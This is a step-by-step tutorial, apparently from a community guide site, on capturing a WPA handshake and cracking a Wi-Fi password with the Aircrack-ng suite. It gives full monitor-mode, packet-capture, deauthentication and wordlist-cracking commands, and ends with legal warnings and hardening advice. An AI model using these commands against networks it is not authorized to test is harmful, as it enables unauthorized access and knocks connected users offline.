Ana içeriğe geç

How to recover a Wi-Fi passwords with Aircrack-ng

  1. How to recover a Wi-Fi passwords with Aircrack-ng, Open Kali's command line Terminal: adım 1, 2 resimden 1. How to recover a Wi-Fi passwords with Aircrack-ng, Open Kali's command line Terminal: adım 1, 2 resimden 2.
    • Press Ctrl + Alt + T to open the Terminal Interface.

  2. How to recover a Wi-Fi passwords with Aircrack-ng, Check your Wireless Adapter: adım 2, 1 resimden 1.
    • Enter the command ifconfig. This will show all your networking interfaces connected to your device.

    • If your operating system recognizes your adapter, then you should see wlan0 under the lo section. However, if you have multiple adapters it may be listed as a different name.

  3. How to recover a Wi-Fi passwords with Aircrack-ng, Enable Monitor Mode: adım 3, 1 resimden 1.
    • Enter the command sudo airmon-ng start wlan0

    • If your adapter is under a different name simply substitute the name where wlan0 is shown

    • If your network adapter supports Monitor Mode then you should see (monitor mode enabled) at the bottom of the screen.

    • The command will also list any processes that might cause issues later on during this guide. These processes should be killed before continuing, which we will demonstrate in the next step.

    • Use the command airmon-ng check kill to check and kill any processes that will interfere.

    • Alternatively, you can use the kill command followed by the numbers used to identify the process.

    • Use the command airodump-ng wlan0 to discover any wireless networks around you.

    • You will need to use Ctrl + C to end the searching process

    • Find your network under the ESSID column.

    • Take note of the following information in your networks row. Channel (CH), BSSID.

    • Use the command sudo airodump-ng -c *Channel Number* -w *ESSID Name* —bssid *BSSID Numbers* wlan0 to start capturing your networks packets

    • Your command should look something like this: sudo airodump-ng -c 1 -w kali —bssid 50:D4:F7:E5:66:F4 wlan0

    • Without closing your previous terminal, open a new terminal with Ctrl + Alt + T

    • Enter the command aireplay-ng -0 *RXQ Number* -a *BSSID Number* wlan0

    • Your command will look like aireplay-ng -0 0 -a 50:D4:F7:E5:66:F4 wlan0

    • Once you de-authenticate your clients you should have your WPA handshake in the upper right hand corner where it says WPA handshake.

    • Once you have your handshake, take note of it and end both processes with Ctrl + C

    • Use your wordlist to decrypt your handshake with the command aircrack-ng -w *your word list*.txt kali-01.cap

Sonuç

Using Aircrack-ng to recover Wi-Fi passwords can be effective under certain conditions. However, it's important to remember that attempting to crack someone's Wi-Fi password without their explicit permission is illegal and extremely unethical. If you find that your network is vulnerable to attacks from Aircrack-ng, consider looking at the tips in the following Bluf.

Bluf: Protecting a Wi-Fi Network from Attacks

To protect your Wi-Fi network from attacks that use Aircrack-ng, consider implementing the following security measures to your network.

  1. Strong Encryption: Use WPA3 or WPA2 with a strong, unique password to enhance the security of your Wi-Fi network.
  2. Regular Password Updates: Keep the password to your Wi-Fi password updated regularly to minimize the risk of unauthorized access.
  3. MAC Address Filtering: Enable MAC address filtering to allow only specific devices to connect to your network.
  4. Disable WPS: Disable Wi-Fi Protected Setup (WPS) as it can be susceptible to brute-force attacks.
  5. Regular Firmware Updates: Keep your router's firmware up to date to ensure it has the latest security patches.
  6. Network Segmentation: Separate guest networks from your main network to limit potential exposure. This is more applicable to enterprise-grade networks, but segmenting your network will prevent users from accessing any device connected to your network.
  7. Intrusion Detection System (IDS): Consider using an IDS to monitor suspicious activity on your network.

The most important thing you should take away from this guide is to remember to use this information responsibly. Obtaining unauthorized access to another's computer system or systems is illegal under the Computer Fraud & Abuse Act.

Please use the knowledge gained from this guide responsibly.

3 farklı kişi bu kılavuzu tamamladı.

Jacob Mehnert

Üyelik tarihi: 10/18/21

26.523 İtibar

43 adet Kılavuz yazıldı

Ekip

iFanatics iFanatics üyesi

Community

54 Üyeler

154 adet Kılavuz yazıldı

0 Yorum

Yorum Ekle

İstatistikleri Görüntüle:

Son 24 Saat: 2

Son 7 gün: 17

Son 30 gün: 74

Her zaman: 2,242